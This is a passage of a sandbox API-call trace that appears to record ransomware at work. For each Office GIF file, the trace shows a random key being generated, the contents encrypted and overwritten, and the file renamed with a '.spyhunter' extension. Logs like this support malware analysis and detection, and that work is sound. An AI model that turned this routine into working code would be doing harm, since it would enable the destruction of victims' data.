lpOverlapped=0x0 | out: lpBuffer=0x270f90c*, lpNumberOfBytesWritten=0x270f8cc*=0x4, lpOverlapped=0x0) returned 1 [0100.809] WriteFile (in: hFile=0x16c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f8cc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f8cc*=0x30, lpOverlapped=0x0) returned 1 [0100.809] CloseHandle (hObject=0x16c) returned 1 [0100.809] GetProcessHeap () returned 0x2c0000 [0100.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0100.809] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14532_.GIF.spyhunter") returned 83 [0100.809] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14532_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14532_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14532_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14532_.gif.spyhunter")) returned 1 [0100.809] GetProcessHeap () returned 0x2c0000 [0100.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0100.809] GetProcessHeap () returned 0x2c0000 [0100.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0100.809] GetProcessHeap () returned 0x2c0000 [0100.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3af148 | out: hHeap=0x2c0000) returned 1 [0100.810] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f908 | out: pbBuffer=0x270f908) returned 1 [0100.810] GetProcessHeap () returned 0x2c0000 [0100.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0100.810] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f900*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f900*=0x30) returned 1 [0100.810] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14531_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14531_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0100.810] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14531_.GIF") returned 73 [0100.810] StrStrW (lpFirst="BD14531_.GIF", lpSrch=".txt") returned 0x0 [0100.810] GetProcessHeap () returned 0x2c0000 [0100.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0100.810] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f8c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f8c4*=0xf5, lpOverlapped=0x0) returned 1 [0100.811] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffff0b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.812] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xf5, lpNumberOfBytesWritten=0x270f8c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f8c4*=0xf5, lpOverlapped=0x0) returned 1 [0100.812] GetProcessHeap () returned 0x2c0000 [0100.812] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0100.812] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.812] WriteFile (in: hFile=0x16c, lpBuffer=0x270f904*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f8c4, lpOverlapped=0x0 | out: lpBuffer=0x270f904*, lpNumberOfBytesWritten=0x270f8c4*=0x4, lpOverlapped=0x0) returned 1 [0100.812] WriteFile (in: hFile=0x16c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f8c4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f8c4*=0x30, lpOverlapped=0x0) returned 1 [0100.812] CloseHandle (hObject=0x16c) returned 1 [0100.812] GetProcessHeap () returned 0x2c0000 [0100.812] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0100.812] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14531_.GIF.spyhunter") returned 83 [0100.812] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14531_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14531_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14531_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14531_.gif.spyhunter")) returned 1 [0101.259] GetProcessHeap () returned 0x2c0000 [0101.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0101.259] GetProcessHeap () returned 0x2c0000 [0101.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0101.259] GetProcessHeap () returned 0x2c0000 [0101.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3af068 | out: hHeap=0x2c0000) returned 1 [0101.260] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f908 | out: pbBuffer=0x270f908) returned 1 [0101.260] GetProcessHeap () returned 0x2c0000 [0101.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0101.260] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f900*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f900*=0x30) returned 1 [0101.260] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115867.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115867.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0101.260] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115867.GIF") returned 73 [0101.260] StrStrW (lpFirst="J0115867.GIF", lpSrch=".txt") returned 0x0 [0101.260] GetProcessHeap () returned 0x2c0000 [0101.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.261] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f8c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f8c4*=0xe0, lpOverlapped=0x0) returned 1 [0101.262] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffff20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.262] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x270f8c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f8c4*=0xe0, lpOverlapped=0x0) returned 1 [0101.262] GetProcessHeap () returned 0x2c0000 [0101.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.262] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.262] WriteFile (in: hFile=0x16c, lpBuffer=0x270f904*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f8c4, lpOverlapped=0x0 | out: lpBuffer=0x270f904*, lpNumberOfBytesWritten=0x270f8c4*=0x4, lpOverlapped=0x0) returned 1 [0101.262] WriteFile (in: hFile=0x16c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f8c4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f8c4*=0x30, lpOverlapped=0x0) returned 1 [0101.262] CloseHandle (hObject=0x16c) returned 1 [0101.262] GetProcessHeap () returned 0x2c0000 [0101.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cd6318 [0101.263] wnsprintfW (in: pszDest=0x2cd6318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115867.GIF.spyhunter") returned 83 [0101.263] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115867.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115867.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115867.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115867.gif.spyhunter")) returned 1 [0101.263] GetProcessHeap () returned 0x2c0000 [0101.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cd6318 | out: hHeap=0x2c0000) returned 1 [0101.263] GetProcessHeap () returned 0x2c0000 [0101.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0101.264] GetProcessHeap () returned 0x2c0000 [0101.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf7460 | out: hHeap=0x2c0000) returned 1 [0101.264] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f900 | out: pbBuffer=0x270f900) returned 1 [0101.264] GetProcessHeap () returned 0x2c0000 [0101.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0101.264] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f8f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f8f8*=0x30) returned 1 [0101.264] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115866.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115866.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0101.264] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115866.GIF") returned 73 [0101.264] StrStrW (lpFirst="J0115866.GIF", lpSrch=".txt") returned 0x0 [0101.264] GetProcessHeap () returned 0x2c0000 [0101.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.264] ReadFile (in: hFile=0x16c, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f8bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f8bc*=0xe0, lpOverlapped=0x0) returned 1 [0101.265] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffff20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.266] WriteFile (in: hFile=0x16c, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x270f8bc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f8bc*=0xe0, lpOverlapped=0x0) returned 1 [0101.266] GetProcessHeap () returned 0x2c0000 [0101.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.266] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.266] WriteFile (in: hFile=0x16c, lpBuffer=0x270f8fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f8bc, lpOverlapped=0x0 | out: lpBuffer=0x270f8fc*, lpNumberOfBytesWritten=0x270f8bc*=0x4, lpOverlapped=0x0) returned 1 [0101.266] WriteFile (in: hFile=0x16c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f8bc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f8bc*=0x30, lpOverlapped=0x0) returned 1 [0101.266] CloseHandle (hObject=0x16c) returned 1 [0101.266] GetProcessHeap () returned 0x2c0000 [0101.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cd6318 [0101.266] wnsprintfW (in: pszDest=0x2cd6318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115866.GIF.spyhunter") returned 83 [0101.266] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115866.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115866.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115866.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115866.gif.spyhunter")) returned 1 [0101.267] GetProcessHeap () returned 0x2c0000 [0101.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cd6318 | out: hHeap=0x2c0000) returned 1 [0101.267] GetProcessHeap () returned 0x2c0000 [0101.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0101.267] GetProcessHeap () returned 0x2c0000 [0101.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf7380 | out: hHeap=0x2c0000) returned 1 [0101.267] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f900 | out: pbBuffer=0x270f900) returned 1 [0101.267] GetProcessHeap () returned 0x2c0000 [0101.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0101.268] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f8f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f8f8*=0x30) returned 1 [0101.268] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115865.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115865.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0101.946] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115865.GIF") returned 73 [0101.946] StrStrW (lpFirst="J0115865.GIF", lpSrch=".txt") returned 0x0 [0101.946] GetProcessHeap () returned 0x2c0000 [0101.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0101.946] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f8bc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f8bc*=0xe0, lpOverlapped=0x0) returned 1 [0101.947] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.947] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x270f8bc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f8bc*=0xe0, lpOverlapped=0x0) returned 1 [0101.947] GetProcessHeap () returned 0x2c0000 [0101.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0101.947] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.948] WriteFile (in: hFile=0x170, lpBuffer=0x270f8fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f8bc, lpOverlapped=0x0 | out: lpBuffer=0x270f8fc*, lpNumberOfBytesWritten=0x270f8bc*=0x4, lpOverlapped=0x0) returned 1 [0101.948] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f8bc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f8bc*=0x30, lpOverlapped=0x0) returned 1 [0101.948] CloseHandle (hObject=0x170) returned 1 [0101.948] GetProcessHeap () returned 0x2c0000 [0101.948] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0101.948] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115865.GIF.spyhunter") returned 83 [0101.948] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115865.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115865.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115865.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115865.gif.spyhunter")) returned 1 [0101.949] GetProcessHeap () returned 0x2c0000 [0101.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0101.949] GetProcessHeap () returned 0x2c0000 [0101.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0101.949] GetProcessHeap () returned 0x2c0000 [0101.949] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf72a0 | out: hHeap=0x2c0000) returned 1 [0101.949] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f8f8 | out: pbBuffer=0x270f8f8) returned 1 [0101.949] GetProcessHeap () returned 0x2c0000 [0101.949] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0101.949] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f8f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f8f0*=0x30) returned 1 [0101.950] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21480_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21480_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0101.950] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21480_.GIF") returned 73 [0101.950] StrStrW (lpFirst="BD21480_.GIF", lpSrch=".txt") returned 0x0 [0101.950] GetProcessHeap () returned 0x2c0000 [0101.950] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0101.950] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f8b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f8b4*=0x14e, lpOverlapped=0x0) returned 1 [0101.951] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffeb2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.951] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x14e, lpNumberOfBytesWritten=0x270f8b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f8b4*=0x14e, lpOverlapped=0x0) returned 1 [0101.951] GetProcessHeap () returned 0x2c0000 [0101.951] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0101.951] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.951] WriteFile (in: hFile=0x170, lpBuffer=0x270f8f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f8b4, lpOverlapped=0x0 | out: lpBuffer=0x270f8f4*, lpNumberOfBytesWritten=0x270f8b4*=0x4, lpOverlapped=0x0) returned 1 [0101.952] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f8b4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f8b4*=0x30, lpOverlapped=0x0) returned 1 [0101.952] CloseHandle (hObject=0x170) returned 1 [0101.952] GetProcessHeap () returned 0x2c0000 [0101.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0101.952] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21480_.GIF.spyhunter") returned 83 [0101.952] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21480_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21480_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21480_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21480_.gif.spyhunter")) returned 1 [0101.952] GetProcessHeap () returned 0x2c0000 [0101.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0101.953] GetProcessHeap () returned 0x2c0000 [0101.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0101.953] GetProcessHeap () returned 0x2c0000 [0101.953] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33b960 | out: hHeap=0x2c0000) returned 1 [0101.953] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f8f8 | out: pbBuffer=0x270f8f8) returned 1 [0101.953] GetProcessHeap () returned 0x2c0000 [0101.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0101.953] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f8f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f8f0*=0x30) returned 1 [0101.953] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21435_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21435_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0101.953] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21435_.GIF") returned 73 [0101.953] StrStrW (lpFirst="BD21435_.GIF", lpSrch=".txt") returned 0x0 [0101.953] GetProcessHeap () returned 0x2c0000 [0101.953] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0101.954] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f8b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f8b4*=0xad, lpOverlapped=0x0) returned 1 [0101.954] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff53, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.955] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xad, lpNumberOfBytesWritten=0x270f8b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f8b4*=0xad, lpOverlapped=0x0) returned 1 [0101.955] GetProcessHeap () returned 0x2c0000 [0101.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0101.955] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.955] WriteFile (in: hFile=0x170, lpBuffer=0x270f8f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f8b4, lpOverlapped=0x0 | out: lpBuffer=0x270f8f4*, lpNumberOfBytesWritten=0x270f8b4*=0x4, lpOverlapped=0x0) returned 1 [0101.955] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f8b4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f8b4*=0x30, lpOverlapped=0x0) returned 1 [0101.955] CloseHandle (hObject=0x170) returned 1 [0101.956] GetProcessHeap () returned 0x2c0000 [0101.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0101.956] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21435_.GIF.spyhunter") returned 83 [0101.956] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21435_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21435_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21435_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21435_.gif.spyhunter")) returned 1 [0101.956] GetProcessHeap () returned 0x2c0000 [0101.956] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0101.956] GetProcessHeap () 